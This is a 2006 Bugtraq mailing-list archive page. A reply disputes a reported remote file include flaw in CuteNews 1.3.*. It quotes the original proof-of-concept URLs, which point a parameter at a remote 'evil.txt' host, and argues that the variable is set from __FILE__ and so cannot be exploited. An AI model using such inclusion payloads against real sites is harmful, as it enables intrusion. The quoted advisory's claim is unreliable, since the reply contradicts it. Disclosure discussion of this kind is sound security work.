Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:




bugtraq logo Bugtraq mailing list archives

Re: CuteNews 1.3.* Remote File Include Vulnerability
From: satalin <satalin () gmail com>
Date: Sat, 02 Sep 2006 21:46:03 +0200

stormhacker () hotmail com wrote:


-----------------Description---------------


$cutepath =  __FILE__;

$cutepath = preg_replace( "'\\\search\.php'", "", $cutepath);

$cutepath = preg_replace( "'/search\.php'", "", $cutepath);


require_once("$cutepath/inc/functions.inc.php");


--------------PoC/Exploit----------------------


show_news.php?cutepath=http://host/evil.txt?

search.php?cutepath=http://host/evil.txt?


$cutepath =  __FILE__;

$cutepath is set to script's working directory, so you can not set it manually.

--------------Solution---------------------


No Patch available.


As no needed? ;)


Greets,
satalin


  By Date           By Thread  

Current thread:
  • Re: CuteNews 1.3.* Remote File Include Vulnerability satalin (Sep 05)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]